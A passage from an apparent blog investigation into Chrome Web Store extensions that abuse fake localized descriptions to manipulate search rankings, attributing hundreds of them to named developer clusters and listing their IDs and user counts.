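  "appDesc": {
    "message": "Example is a lightweight, privacy friendly coupon finder.\n\n\n\nGMass: Powerful mail merge for GMail Wikiwand - Wikipedia, and beyond Super dark mode Desktopify"
  }
}
```

An English-language user never sees this text, yet the shared search index happily matches it.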

I’ve been maintaining a GitHub repository with Chrome extension manifests for a while, uploading new snapshots every now and then. Unfortunately, it only contained English names and descriptions. So I’ve now added a directory with localized descriptions for each extension. With that data, most of the issues became immediately obvious – even without knowing Swahili.

Screenshot of a JSON listing. The key name is sw indicating Swahili language. The corresponding description starts with “Charm is a lightweight, privacy friendly coupon finder.” Later on it contains a sequence of newlines, followed by a wall of text along the lines of: “GMass: Powerful mail merge for GMail Wikiwand - Wikipedia, and beyond Super dark mode Desktopify”

Update (2025-01-09): Apparently, Google has already been made aware of this issue a year ago at the latest. Your guess is as good as mine as to why it hasn’t been addressed yet.

Who is doing it?

Sifting through the suspicious descriptions and weeding out false positives brought up 920 extensions with bogus “translations” so far, and I definitely didn’t get all of them (see the extension lists). But that doesn’t actually mean hundreds of extension developers. I quickly noticed patterns: somebody applying roughly the same strategy to a large cluster of extensions. For example, European developers tended to “sacrifice” some Asian languages like Bengali, whereas developers originating in Asia preferred European languages like Estonian. These strategies were distinctly different from each other, and there weren’t a whole lot of them, so a relatively low number of parties seems to be involved. Some I could even put a name on.

Kodice LLC / Karbon Project LP / BroCode LTD

One such cluster of extensions was already featured on this blog in 2023. Back then I listed 108 of their extensions, which was only a small sample of their operations. Out of that original sample, 96 extensions remain active in Chrome Web Store. And out of these, 81 extensions are abusing translations to improve their ranking in the extension search. From the look of it, all their developers now speak Russian – I guess they are no longer hiring in Ukraine. I’ve expanded on the original list a bit, but attribution is unfortunately too time-consuming here. So the real number is likely well above the 122 extensions I now list for this cluster.

Back in 2023 some of these extensions were confirmed to spy on users, commit affiliate fraud or inject ads into web pages. The others seemed benign which most likely meant that they were accumulating users and would turn malicious later. But please don’t mention Kodice LLC, Karbon Project LP, BroCode LTD in the context of malicious extensions and Chrome Web Store spam, they don’t like that. In fact, they sent a bogus DMCA takedown notice in an attempt to remove my article from the search engines, claiming that it violates the copyright of the …checks notes… Hacker News page discussing that very article. So please don’t say that Kodice LLC, Karbon Project LP, BroCode LTD are spamming Chrome Web Store with their extensions which would inevitably turn on their users – they are definitely the good guys … sorry, good bros I mean.

PDF Toolbox cluster

Another extension cluster has also appeared on this blog before. Back in 2023, an investigation that started with the PDF Toolbox extension brought up 34 malicious extensions. The extensions contained obfuscated code that hijacked people’s searches and monetized them by redirecting to Bing. Not that they were limited to that – they could potentially do far more damage.

Note: The PDF Toolbox extension is long gone from Chrome Web Store and unrelated to the extension with the same name available there now.

Google removed all the extensions I reported back then, but whoever is behind them kept busy of course. I found 107 extensions belonging to the same cluster; out of these, 100 extensions are on my list due to abusing translations to improve their ranking. I didn’t have the time to do an in-depth analysis of these extensions, but at least one (not on the list) is again doing search hijacking, and not even hiding it. The few others I briefly looked at didn’t have any obvious malicious functionality – yet.

Unfortunately, I haven’t come across many clues as to who is behind these extensions. There is a slight indication that they might be related to the BroCode cluster, but that’s far from certain given the significant differences between the two. One thing is certain however: you shouldn’t believe their user numbers; these have clearly been artificially inflated.

ZingFront Software / ZingDeck / BigMData

There is one more huge extension cluster that I investigated in 2023. Back then I gave up without publishing my findings, in part due to Google’s apparent lack of interest in fighting spam in their add-on store. Lots of websites, lots of fake personas and supposed companies that don’t actually exist, occasionally even business addresses that don’t exist in the real world. There are names like LinkedRadar, FindNiche or SellerCenter, and they aren’t only spamming Chrome Web Store but also mobile app stores and search engines, for example. This is clearly a big operation, but initially all I could really tell was that this was the work of Chinese-speaking people. Was this a bunch of AI enthusiasts looking to make a quick buck and exchanging ideas?

In hindsight, it took me too long to realize that many of the websites run on ZingFront infrastructure and that ZingFront employees are apparently involved. Then things started falling into place, with the clues being so obvious: I found BigMData International PTE. LTD. linked to some of the extensions, and ZingDeck Intl LTD. responsible for some of the others. Both companies are located at the same address in Singapore and are obviously related. And both appear to be subsidiaries of ZingFront Software, an AI startup in Beijing. ZingDeck claims to have 120 employees, which is quite sufficient to flood Chrome Web Store with hundreds of extensions. Being funded by Baidu Ventures certainly helps as well.

Altogether I could attribute 223 extensions on my list to this cluster. For this article I could not really inspect the functionality of these extensions, but it seems they are monetized by selling subscriptions to premium functionality. The same seems to be true for the numerous other offers pushed out by these companies.

I asked ZingFront Software for a comment but haven’t heard back from them so far.

ExtensionsBox, Lazytech, Yue Apps, Chrome Extension Hub, Infwiz, NioMaker

The extension clusters ExtensionsBox, Lazytech, Yue Apps, Chrome Extension Hub, Infwiz and NioMaker produce very similar extensions and all seem to be run by Chinese-speaking developers. Some of those might actually be one cluster, or they might all be subdivisions of ZingDeck. Quite frankly, I didn’t want to waste even more time figuring out who is working together and who is competing, so I listed them all separately.

Free Business Apps

This is a large cluster which I hadn’t noticed before. It has hundreds of extensions connected to websites like Free Business Apps, PDFWork, DLLPlayer and many more. It contributed “merely” 55 extensions to my list however, because the developers of these extensions generally prefer to avoid awkward situations due to mismatched translations. Instead, they force the desired (English) keywords into all translations of the extension’s description. This approach is likely aimed at gaming general search engines rather than merely Chrome Web Store search. As that is out of scope for this article, only the relatively rare exceptions made my list here.

It isn’t clear who is behind this cluster of extensions. On one edge of the cluster I found the Ukraine-based Blife LLC, yet their official extensions aren’t linked to the cluster. I asked the company for comment and got a confirmation of what I had already suspected after looking at a number of court decisions: a former developer and co-owner left the company, taking some of its assets with him. He now seems to be involved with at least some of the people running this cluster of extensions.

The other edge of the cluster doesn’t seem to speak Russian or Ukrainian however; there are instead weak indications that Farsi speakers are involved. Here I found the Tehran-based Xino Digital, which develops some extensions with weak connections to this cluster. While Xino Digital specializes in “Digital Marketing” and “SEO & Organic Traffic,” they seem to lack the resources for this kind of operation. I asked Xino Digital for a comment but haven’t heard back so far.

The approaches

While all extensions listed use translations to mess with Chrome Web Store search, a number of different approaches can be distinguished. Most extensions combine a few of the approaches listed below. Some extension clusters use the same approaches consistently, others vary theirs. The extension lists link to the approaches that apply to each extension.

1. Different extension name

This approach is very popular, likely because Chrome Web Store search weights the extension name more heavily than its descriptions. So many extensions use slight variations of their original name depending on the language. Some extensions go as far as using completely different names, occasionally entirely unrelated to the extension’s purpose – all to show up prominently in searches.

2. Different short description

Similarly, some extensions contain different variants of their short description for various languages. The short description typically doesn’t change much and is only used to show up for a bunch of related search keywords. A few extensions, however, replaced their short description for some languages with a plain list of keywords.

3. Using competitors’ names

In some cases I noticed extensions using the names of their competitors or other related products. Some would go as far as “renaming” themselves into a competing product in some languages. In other cases this approach is less obvious, e.g. when extension descriptions provide lists of “alternatives” or “compatible extensions.” I haven’t flagged this approach consistently, simply because I don’t always know who the competitors are.

4. Considerably more extensive extension description

Some extensions have a relatively short and concise English description, yet the “translation” into some other languages is a massive wall of text, often making little sense. Sometimes a translation is present but “extended” with a lengthy English passage. In other cases only English text is present. This text seems to exist only to place a bunch of keywords.

Note that translation management in Chrome Web Store is quite messy, so multiple variants of the English translation aren’t necessarily a red flag – these might have simply been forgotten. Consequently, I tried to err in favor of extension authors when flagging this approach.

5. Keywords at the end of extension description

A very popular approach is taking a translation (or an untranslated English description), then adding a long list of keywords and keyphrases to the end of it in some languages. Often this block is visually separated by a bunch of empty lines, making sure people actually reading the description in this language aren’t too confused.

6. Keywords within the extension description

A more stealthy approach is hiding the keywords within the extension description. Some extensions will use slight variations of the same text, only differing in one or two keywords. Others use automated translations of their descriptions but place a bunch of (typically English) keywords in these translations. Occasionally there is a translation which is broken up by a long list of unrelated keywords.

7. Different extension description

In a few cases the extension description just looked like completely unrelated text. Sometimes it seemed to be a copy of a description from a competing extension; other times it made no sense whatsoever.

And what should Google do about it?

Looking at Chrome Web Store policy on spam and abuse, the formulation is quite clear:

Developers must not attempt to manipulate the placement of any extensions in the Chrome Web Store.

So Google can and should push back on this kind of manipulation. At the very least, Google might dislike the fact that there are currently at least eleven extensions named “Google Translate” – at least in some languages. In fact, per the same policy Google isn’t even supposed to tolerate spam in Chrome Web Store:

We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store.

Unfortunately, Google hasn’t been very keen on enforcing this policy in the past.

There is also a possible technical solution here. By making Chrome Web Store search index per-language, Google could remove the incentives for this kind of manipulation. If search results for Bengali no longer show up in English-language searches, there is no point messing up the Bengali translation any more. Of course, searching across languages is a feature – yet this feature isn’t worth it if Google cannot contain the abuse by other means.

Quite frankly, however, I feel that Google should go beyond basic containment. The BroCode and PDF Toolbox clusters are known to produce malicious extensions. These need to be monitored proactively, and the same kind of attention might be worth extending to the other extension clusters as well.

The extensions in question

One thing up front: Chrome Web Store is messy. There are copycats, pretenders, scammers. So attribution isn’t always a straightforward affair, and there might occasionally be an extension attributed to one of the clusters which doesn’t belong there. It’s far more common, however, for an extension not to be sorted into its cluster at all, simply because the evidence linking it to the cluster isn’t strong enough and I only had limited time to investigate.

The user counts listed reflect the state on December 13, 2024.

Kodice / Karbon Project / BroCode

Name Weekly active users Extension ID Approaches
What Font - find font & color 125 abefllafeffhoiadldggcalfgbofohfa 1, 2, 4
Video downloader web 1,000,000 acmbnbijebmjfmihfinfipebhcmgbghi 1, 2, 4
Picture in Picture - Floating player 700,000 adnielbhikcbmegcfampbclagcacboff 1, 2, 4
Floating Video Player Sound Booster 600,000 aeilijiaejfdnbagnpannhdoaljpkbhe 1, 2, 4
Sidebarr - ChatGPT, bookmarks, apps and more 100,000 afdfpkhbdpioonfeknablodaejkklbdn 1, 2, 5
Adblock for Youtube™ - Auto Skip ad 8,000 anceggghekdpfkjihcojnlijcocgmaoo 1, 2
Cute Cursors - Custom Cursor for Chrome™ 1,000,000 anflghppebdhjipndogapfagemgnlblh 4
Adblock for Youtube - skip ads 800,000 annjejmdobkjaneeafkbpipgohafpcom 1, 2, 3, 4
Translator, Dictionary - Accurate Translate 800,000 bebmphofpgkhclocdbgomhnjcpelbenh 1, 2, 3, 4
Screen Capture, Screenshot, Annotations 500,000 bmkgbgkneealfabgnjfeljaiegpginpl 1, 2
Sweet VPN 100,000 bojaonpikbbgeijomodbogeiebkckkoi 1, 2
Sound Booster - Volume Control 3,000,000 ccjlpblmgkncnnimcmbanbnhbggdpkie 1, 2, 4, 6
Web Client for Instagram™ - Sidegram 200,000 cfegchignldpfnjpodhcklmgleaoanhi 1, 2
Paint Tool for Chrome 200,000 coabfkgengacobjpmdlmmihhhfnhbjdm 1, 2, 4
History & Cache Cleaner - Smart Clean 2,000 dhaamkgjpilakclbgpabiacmndmhhnop 1, 2
Screenshot & Screen Video Record by Screeny 2,000,000 djekgpcemgcnfkjldcclcpcjhemofcib 1, 2, 4
Video Downloader for U 3,000,000 dkbccihpiccbcheieabdbjikohfdfaje 4
Multi Chat - Messenger for WhatsApp 2,000,000 dllplfhjknghhdneiblmkolbjappecbe 1, 2, 3, 7
Night Shift Mode 200,000 dlpimjmonhbmamocpboifndnnakgknbf 1, 2, 4
Music Downloader - VKsaver 500,000 dmbjkidogjmmlejdmnecpmfapdmidfjg 1, 2, 4
Daily Tab - New tab with ChatGPT 1,000 dnbcklfggddbmmnkobgedggnacjoagde 1, 2, 4
Web Color Picker - online color grabber 1,000,000 dneifdhdmnmmlobjbimlkcnhkbidmlek 1, 3, 4
Paint - Drawings Easy 300,000 doiiaejbgndnnnomcdhefcbfnbbjfbib 1, 2, 4, 6
Block Site - Site Blocker & Focus Mode 2,000,000 dpfofggmkhdbfcciajfdphofclabnogo 1, 2, 3, 4
2048 Online Classic game 200,000 eabhkjojehdleajkbigffmpnaelncapp 1, 2
Gmail Notifier - gmail notification tool 100,000 ealojglnbikknifbgleaceopepceakfn 6
Volume Recorder Online 1,000,000 ebdbcfomjliacpblnioignhfhjeajpch 1, 2, 4, 6
Volume Booster - Sound & Bass boost 1,000,000 ebpckmjdefimgaenaebngljijofojncm 1, 2, 4, 6
Screenshot Tool - Screen Capture & Editor 1,000,000 edlifbnjlicfpckhgjhflgkeeibhhcii 1, 2, 4, 6
Tabrr Dashboard - New Tab with ChatGPT 300,000 ehmneimbopigfgchjglgngamiccjkijh 6
New Tab for Google Workspace™ 200,000 ehpgcagmhpndkmglombjndkdmggkgnge 1, 4, 5
Equalizer - Bass Booster Master 200,000 ejigejogobkbkmkgjpfiodlmgibfaoek 1, 2, 4, 6
Paint 300,000 ejllkedmklophclpgonojjkaliafeilj 1, 4
Online messengers in All-in-One chat 200,000 ekjogkoigkhbgdgpolejnjfmhdcgaoof 2, 4, 6
Ultimate Video Downloader 700,000 elpdbicokgbedckgblmbhoamophfbchi 2
Translate for Chrome -Translator, Dictionary 500,000 elpmkbbdldhoiggkjfpgibmjioncklbn 1, 2, 3
Color Picker, Eyedropper - Geco colorpick 2,000,000 eokjikchkppnkdipbiggnmlkahcdkikp 1, 2, 3, 4, 6
Dark Mode for Chrome 1,000,000 epbpdmalnhhoggbcckpffgacohbmpapb 1, 2, 4
VPN Ultimate - Best VPN by unblock 400,000 epeigjgefhajkiiallmfblgglmdbhfab 1, 2, 4
Flash Player Enabler 300,000 eplfglplnlljjpeiccbgnijecmkeimed 1, 2
ChitChat - Search with ChatGPT 2,000,000 fbbjijdngocdplimineplmdllhjkaece 1, 2, 3, 4
Simple Volume Booster 1,000,000 fbjhgeaafhlbjiejehpjdnghinlcceak 1, 2, 4, 6
Free VPN for Chrome - VPN Proxy 1click VPN 8,000,000 fcfhplploccackoneaefokcmbjfbkenj 1, 2
InSaverify - Web for Instagram™ 800,000 fobaamfiblkoobhjpiigemmdegbmpohd 1, 2, 4, 6
ChatGPT Assistant - GPT Search 900,000 gadbpecoinogdkljjbjffmiijpebooce 1, 2, 4, 6
Adblock all advertisement - No Ads extension 700,000 gbdjcgalliefpinpmggefbloehmmknca 1, 2, 3, 4
Web Sound Equalizer 700,000 gceehiicnbpehbbdaloolaanlnddailm 1, 2, 4, 6
Screenshot Master: Full Page Capture 700,000 ggacghlcchiiejclfdajbpkbjfgjhfol 1, 2, 4
Dark Theme - Dark mode for Chrome 900,000 gjjbmfigjpgnehjioicaalopaikcnheo 1, 2, 4
Cute Tab - Custom Dashboard 60,000 gkdefhnhldnmfnajfkeldcaihahkhhnd 1
Quick Translate: Reading & writing translator 100,000 gpdfpljioapjogbnlpmganakfjcemifk 1, 2, 4
HD Video Downloader 800,000 hjlekdknhjogancdagnndeenmobeofgm 1, 2
Web Translate - Online translator 1,000,000 hnfabcchmopgohnhkcojhocneefbnffg 1, 2, 3, 4, 6
QR Code Generator 300,000 hoeiookpkijlnjdafhaclpdbfflelmci 1, 2, 4
2048 Game 1,000,000 iabflonngmpkalkpbjonemaamlgdghea 4
Translator 100,000 icchadngbpkcegnabnabhkjkfkfflmpj 4, 6
Multilanguage Translator 1,000,000 ielooaepfhfcnmihgnabkldnpddnnldl 1, 2, 3, 4, 6
FocusGuard - Block Site & Focus Mode 400,000 ifdepgnnjpnbkcgempionjablajancjc 1, 2, 3, 7
Scrnli - Screen Recorder & Screen Capture App 1,000,000 ijejnggjjphlenbhmjhhgcdpehhacaal 1, 2, 4
Web Paint Tool - draw online 600,000 iklgljbighkgbjoecoddejooldolenbj 1, 2, 4, 5
Screen Recorder and Screenshot Tool 1,000,000 imopknpgdihifjkjpmjaagcagkefddnb 1, 2, 4
Free VPN Chrome extension - Best VPN by uVPN 1,000,000 jaoafpkngncfpfggjefnekilbkcpjdgp 1, 2, 7
Video Downloader Social 1,000,000 jbmbplbpgcpooepakloahbjjcpfoegji 1, 2, 4
Color Picker Online - Eyedropper Tool 189 jbnefeeccnjmnceegehljhjonmlbkaji 1, 2
Volume Booster, equalizer → Audio control 1,000,000 jchmabokofdoabocpiicjljelmackhho 1, 4
PDF Viewer 1,000,000 jdlkkmamiaikhfampledjnhhkbeifokk 1, 2, 4
Adblock Web - Adblocker for Chrome 300,000 jhkhlgaomejplkanglolfpcmfknnomle 1, 2, 3
Adblock Unlimited - Adblocker 600,000 jiaopkfkampgnnkckajcbdgannoipcne 1, 2, 3, 4
Hide YouTube distraction - shorts block 1,000 jipbilmidhcobblmekbceanghkdinccc 1, 2, 3
ChatGPT for Chrome - GPT Search 700,000 jlbpahgopcmomkgegpbmopfodolajhbl 1, 2, 3
Adblock for YouTube™ 2,000,000 jpefmbpcbebpjpmelobfakahfdcgcmkl 1, 2, 3, 4
User Agent Switcher 100,000 kchfmpdcejfkipopnolndinkeoipnoia 1
Speed Test for Chrome - WiFi speedtest 400,000 khhnfdoljialnlomkdkphhdhngfppabl 1, 2, 4, 6
Video Downloader professional 400,000 knkpjhkhlfebmefnommmehegjgglnkdm 1, 2, 4
Quick Translate 700,000 kpcdbiholadphpbimkgckhggglklemib 1, 2, 4, 6
Tab Suspender 100,000 laameccjpleogmfhilmffpdbiibgbekf 1
Adblock for Youtube - ad blocker tool 800,000 lagdcjmbchphhndlbpfajelapcodekll 1, 2, 3, 4
PDF Viewer - open in PDF Reader 300,000 ldaohgblglnkmddflcccnfakholmaacl 1, 2, 4
Moment - #1 Personal Dashboard for Chrome 200,000 lgecddhfcfhlmllljooldkbbijdcnlpe 1
Screen Video Recorder & Screenshot 400,000 lhannfkhjdhmibllojbbdjdbpegidojj 1, 2
Dark Theme - Dark Reader for Web 1,000,000 ljjmnbjaapnggdiibfleeiaookhcodnl 1, 2, 4, 6
Auto Refresh Page - reload page 500,000 lkhdihmnnmnmpibnadlgjfmalbaoenem 1, 2, 4, 6
Flash Player for Web 800,000 lkhhagecaghfakddbncibijbjmgfhfdm 1, 2, 4, 6
INSSAVE - App for Instagram 100,000 lknpbgnookklokdjomiildnlalffjmma 1, 2, 4, 6
Simple Translator, Dictionary, TTS 1,000,000 lojpdfjjionbhgplcangflkalmiadhfi 1, 2, 3, 4, 6
Web paint tool - Drawww 60,000 mclgkicemmkpcooobfgcgocmcejnmgij 6
Adblock for Twitch 200,000 mdomkpjejpboocpojfikalapgholajdc 1, 2, 3, 4
Infinite Dashboard - New Tab like no other 200,000 meffljleomgifbbcffejnmhjagncfpbd 1, 2, 4
ChatGPT Assistant for Chrome - SidebarGPT 1,000,000 mejjgaogggabifjfjdbnobinfibaamla 1, 2
Volume Max - Ultimate Sound Booster 1,000,000 mgbhdehiapbjamfgekfpebmhmnmcmemg 1, 2, 4
Good Video Downloader 400,000 mhpcabliilgadobjpkameggapnpeppdg 4
Video Downloader Unlimited 1,000,000 mkjjckchdfhjbpckippbnipkdnlidbeb 1, 2, 4
ChatGPT for Google: Search GPT 500,000 mlkjjjmhjijlmafgjlpkiobpdocdbncj 1, 2, 4, 6
Translate - Translator, Dictionary, TTS 1,000,000 mnlohknjofogcljbcknkakphddjpijak 1, 2, 3, 4, 5
Web Paint - Page Marker & Editor 400,000 mnopmeepcnldaopgndiielmfoblaennk 1, 2, 4, 6
Auto Refresh & Page Monitor 1,000,000 nagebjgefhenmjbjhjmdifchbnbmjgpa 1, 2, 4
VPN Surf - Fast VPN by unblock 800,000 nhnfcgpcbfclhfafjlooihdfghaeinfc 1, 2, 4
SearchGPT - ChatGPT for Chrome 2,000,000 ninecedhhpccjifamhafbdelibdjibgd 1, 2
Video Speed Controller for HTML videos 400,000 nkkhljadiejecbgelalchmjncoilpnlk 1, 2, 4, 6
Flash Player that Works! 300,000 nlfaobjnjbmbdnoeiijojjmeihbheegn 1, 2, 4, 6
Sound Booster - increase volume up 1,000,000 nmigaijibiabddkkmjhlehchpmgbokfj 1, 2, 4, 6
Voice Reader: Read Aloud Text to Speech (TTS) 500,000 npdkkcjlmhcnnaoobfdjndibfkkhhdfn 1, 2, 4, 5
uTab - Unlimited Custom Dashboard 200,000 npmjjkphdlmbeidbdbfefgedondknlaf 1, 4, 6
Flash Player for Chrome 600,000 oakbcaafbicdddpdlhbchhpblmhefngh 1, 2
Paint Tool by Painty 400,000 obdhcplpbliifflekgclobogbdliddjd 1, 2
Night Shift 200,000 ocginjipilabheemhfbedijlhajbcabh 1, 2
Editor for Docs, Sheets & Slides 200,000 oepjogknopbbibcjcojmedaepolkghpb 1, 2, 6
Accept all cookies 300,000 ofpnikijgfhlmmjlpkfaifhhdonchhoi 1, 2, 3, 4
The Cleaner - delete Cookies and Cache 100,000 ogfjgagnmkiigilnoiabkbbajinanlbn 1, 2
Screenshot & Screen Recorder 1,000,000 okkffdhbfplmbjblhgapnchjinanmnij 1, 2, 4
Cute ColorBook - Coloring Book Online 9,000 onhcjmpaffbelbeeaajhplmhfmablenk 1
What Font - font finder 400,000 opogloaldjiplhogobhmghlgnlciebin 1, 2, 4
Translator - Select to Translate 1,000,000 pfoflbejajgbpkmllhogfpnekjiempip 1, 2, 3, 4, 6
Custom Cursors for Chrome 800,000 phfkifnjcmdcmljnnablahicoabkokbg 1, 2, 4
Color Picker - Eyedropper Tool 100,000 phillbeieoddghchonmfebjhclflpoaj 1, 2, 4, 6
Text mode for websites - ReadBee 500,000 phjbepamfhjgjdgmbhmfflhnlohldchb 1, 2, 4, 6
Dark Mode - Dark Reader for Сhrome 8,000,000 pjbgfifennfhnbkhoidkdchbflppjncb 1, 2, 4, 6
Sound Booster - Boost My Bass 900,000 plmlopfeeobajiecodiggabcihohcnge 1, 2, 4
Sound Booster 100,000 pmilcmjbofinpnbnpanpdadijibcgifc 1, 2, 4
Screen Capture - Screenshot Tool 700,000 pmnphobdokkajkpbkajlaiooipfcpgio 1, 4
Floating Video with Playback Controls 800,000 pnanegnllonoiklmmlegcaajoicfifcm 1, 2
Cleaner - history & cache clean 100,000 pooaemmkohlphkekccfajnbcokjlbehk 1, 2, 4, 6

PDF Toolbox cluster

Name Weekly active users Extension ID Approaches
Stick Ninja Game 3,000,000 aamepfadihoeifgmkoipamkenlfpjgcm 4
Emoboard Emoji Keyboard 3,000,000 aapdabiebopmbpidefegdaefepkinidd 1, 2, 4
Flappy Bird Original 4,000,000 aejdicmbgglbjfepfbiofnmibcgkkjej 1, 2, 4
Superb Copy 4,000,000 agdjnnfibbfdffpdljlilaldngfheapb 1, 2, 4
Super Volume Booster 1,000,000 ahddimnokcichfhgpibgbgofheobffkb 4
Enlargify 2,000,000 aielbbnajdbopdbnecilekkchkgocifh 1, 2, 4
ImgGet 3,000,000 anblaegeegjbfiehjadgmonejlbcloob 1, 2, 4
Blaze VPN for Chrome 8,000,000 anenfchlanlnhmjibebhkgbnelojooic 1, 2, 4
Web Paint Smart 1,000,000 baaibngpibdagiocgahmnpkegfnldklp 1, 2, 4
Click Color Picker 4,000,000 bfenhnialnnileognddgkbdgpknpfich 1, 2, 4
Dino 3D 3,000,000 biggdlcjhcjibifefpchffmfpmclmfmk 1, 2, 4
Soundup Sound Booster 6,000,000 bjpebnkmbcningccjakffilbmaojljlb 1, 2, 7
Yshot 3,000,000 bkgepfjmcfhiikfmamakfhdhogohgpac 1, 2, 4, 7
VidRate 4,000,000 bmdjpblldhdnmknfkjkdibljeblmcfoi 1, 2, 4
Ultra Volume Booster 3,000,000 bocmpjikpfmhfcjjpkhfdkclpfmceccg 1, 2, 4
Supreme Copy 6,000,000 cbfimnpbnbgjbpcnaablibnekhfghbac 1, 2, 4
Lumina Night Mode 400,000 ccemhgcpobolddhpebenclgpohlkegdg 1, 2, 4
Amazing Screen Recorder 6,000,000 cdepgbjlkoocpnifahdfjdhlfiamnapm 1, 2, 4
BPuzzle 10,000 cgjlgmcfhoicddhjikmjglhgibchboea 1, 2, 4
Super Video Speed Controller 6,000,000 chnccghejnflbccphgkncbmllhfljdfa 1, 2, 4
Lensify 1,000,000 ckdcieaenmejickienoanmjbhcfphmio 1, 2, 4
FontSpotter 2,000,000 cncllbaocdclnknlaciemnogblnljeej 1, 2, 4, 6
ImageNest 2,000,000 dajkomgkhpnmdilokgoekdfnfknjgckh 1, 2, 4
Swift Auto Refresh 4,000,000 dbplihfpjfngpdogehdcocadhockmamf 1, 2, 4
StopSurf 2,000,000 dcjbilopnjnajannajlojjcljaclgdpd 1, 2, 4
PDF SmartBox 10,000,000 dgbbafiiohandadmjfcffjpnlmdlaalh 1, 2, 4
Dungeon Dodge 3,000,000 dkdeafhmbobcccfnkofedleddfbinjgp 1, 2, 4
Scope Master 2,000,000 dlbfbjkldnioadbilgbfilbhafplbnan 1, 2, 4
RazorWave 3,000,000 ecinoiamecfiknjeahgdknofjmpoemmi 1, 2, 4
TurboPlay 4,000,000 ehhbjkehfcjlehkfpffogeijpinlgjik 1, 2, 4
Emoji keyboard live 3,000,000 elhapkijbdpkjpjbomipbfofipeofedj 1, 2, 4
Flashback Flash Player 3,000,000 emghchaodgedjemnkicegacekihblemd 1, 2, 4
RampShield Adblock 2,000,000 engbpelfmhnfbmpobdooifgnfcmlfblf 1, 2, 3, 4
BackNav 2,000,000 epalebfbjkaahdmoaifelbgfpideadle 1, 2, 4
Spark blocker 5,000,000 gfplodojgophcijhbkcfmaiafklijpnf 1, 2, 7
EmuFlash 1,000,000 ghomhhneebnpahhjegclgogmbmhaddpi 1, 2, 4
Minesweeper Original 4,000,000 gjdmanggfaalgnpinolamlefhcjimmam 1, 2, 4
PixGrid Ruler 1,000,000 glkplndamjplebapgopdlbicglmfimic 1, 2, 4
Flexi PDF Reader 1,000,000 gmpignfmmkcpnildloceikjmlnjdjgdg 1, 2, 4
Dino Rush 2,000,000 hbkkncjljigpfhghnjhjaaimceakjdoo 1, 2, 4
Amazing color picker 4,000,000 hclbckmnpbnkcpemopdngipibdagmjei 1, 2, 4
ChatGPT Assistant Plus 6,000,000 hhclmnigoigikdgiflfihpkglefbaaoa 1, 2, 4
Bspace 3,000,000 hhgokdlbkelmpeimeijobggjmipechcp 1, 2, 4
Bomberman Classic Game 4,000,000 hlcfpgkgbdgjhnfdgaechkfiddkgnlkg 4
Inline Lingo 4,000,000 hmioicehiobjekahjabipaeidfdcnhii 1, 2, 4
Superpowers for Chatgpt 4,000,000 ibeabbjcphoflmlccjgpebbamkbglpip 1, 2, 4
Spark Auto Refresh 4,000,000 ifodiakohghkaegdhahdbcdfejcghlob 1, 2, 4
Video Speed Pro 6,000,000 iinblfpbdoplpbdkepibimlgabgkaika 1, 2, 4
Elysian EPUB Reader 10,000 ijlajdhnhokgdpdlbiomkekneoejnhad 1, 4
Smart Color Picker 1,000,000 ilifjbbjhbgkhgabebllmlcldfdgopfl 1, 2, 4
Ad Skip Master for Youtube 6,000,000 imlalpfjijneacdcjgjmphcpmlhkhkho 1, 2, 4, 7
Shopify spy scraper & parser 300,000 injdgfhiepghpnihhgmkejcjnoohaibm 1, 2, 4
Gloom Dark Mode 4,000,000 ioleaeachefbknoefhkbhijdhakaepcb 1, 2, 4
SnapTrans 3,000,000 jfcnoffhkhikehdbdioahmlhdnknikhl 1, 2, 4
DownloadAs PNG JPG 2,000,000 jjekghbhljeigipmihbdeeonafimpole 1, 2, 4
Umbra Dark Mode 3,000,000 jjlelpahdhfgabeecnfppnmlllcmejkg 1, 2, 4
Power Tools for ChatGPT 11,000,000 jkfkhkobbahllilejfidknldjhgelcog 1, 2, 4, 6
Image Formatter 7,000 kapklhhpcnelfhlendhjfhddcddfabap 1, 2, 4
Safum free VPN 6,000,000 kbdlpfmnciffgllhfijijnakeipkngbe 1, 2, 3, 4
TabColor color picker 500,000 kcebljecdacbgcoiajdooincchocggha 1, 2, 4
Tonalis Audio Recorder 3,000,000 kdchfpnbblcmofemnhnckhjfjndcibej 1, 2, 4
2048 Classic Game 6,000,000 kgfeiebnfmmfpomhochmlfmdmjmfedfj 4
Pixdownify 7,000 kjeimdncknielhlilmlgbclmkbogfkpo 1, 2, 4, 7
Avatar Maker Studio 3,000,000 klfkmphcempkflbmmmdphcphpppjjoic 1, 2, 4
TypeScan What Font Finder 2,000,000 klopcieildbkpjfgfohccoknkbpchpcd 1, 2, 4
Rad Video Speed Controller 1,000,000 knekhgnpelgcdmojllcbkkfndcmnjfpp 1, 2, 4
Sublime Copy 2,000,000 kngefefeojnjcfnaegliccjlnclnlgck 1, 2, 4
2048 Game 6,000,000 kopgfdlilooenmccnkaiagfndkhhncdn 4
Easy PDF Viewer 600,000 kppkpfjckhillkjfhpekeoeobieedbpd 1, 2, 4
Fullshot 900,000 lcpbgpffiecejffeokiimlehgjobmlfa 1, 2, 4
Page Auto Refresh 8,000,000 ldgjechphfcppimcgcjcblmnhkjniakn 1, 2, 4
Viddex Video Downloader 2,000,000 ldmhnpbmplbafajaabcmkindgnclbaci 1, 2, 4
Smart Audio Capture 3,000,000 lfohcapleakcfmajfdeomgobhecliepj 1, 2, 4
Readline 3,000,000 lgfibgggkoedaaihmmcifkmdfdjenlpp 1, 2, 4
Amazing Auto Refresh 6,000,000 lgjmjfjpldlhbaeinfjbgokoakpjglbn 1, 2, 4
Picture in Picture player 5,000,000 lppddlnjpnlpglochkpkepmgpcjalobc 1, 2, 4
Readwell 1,000,000 mafdefkoclffkegnnepcmbcekepgmgoe 1, 2, 4
Screenshot X 1,000,000 mfdjihclbpcjabciijmcmagmndpgdkbp 1, 2, 3, 4
TubeBlock - Adblock for Youtube 7,000,000 mkdijghjjdkfpohnmmoicikpkjodcmio 1, 2, 4
Shade Dark Mode 16,000,000 mkeimkkbcndbdlfkbfhhlfgkilcfniic 1, 2, 4
PDF Wizardry 3,000,000 moapkmgopcfpmljondihnidamjljhinm 1, 2, 4
ShieldSpan Adblock 2,000,000 monfcompdlmiffoknmpniphegmegadoa 1, 2, 3, 4
Snap Color Picker 6,000,000 nbpljhppefmpifoffhhmllmacfdckokh 1, 2, 4
Spelunky Classic 3,000,000 nggoojkpifcfgdkhfipiikldhdhljhng 4
Adkrig 6,000,000 ngpkfeladpdiabdhebjlgaccfonefmom 1, 2, 3, 4
Snap Screen Recorder 4,000 njmplmjcngplhnahhajkebmnaaogpobl 1, 2, 4
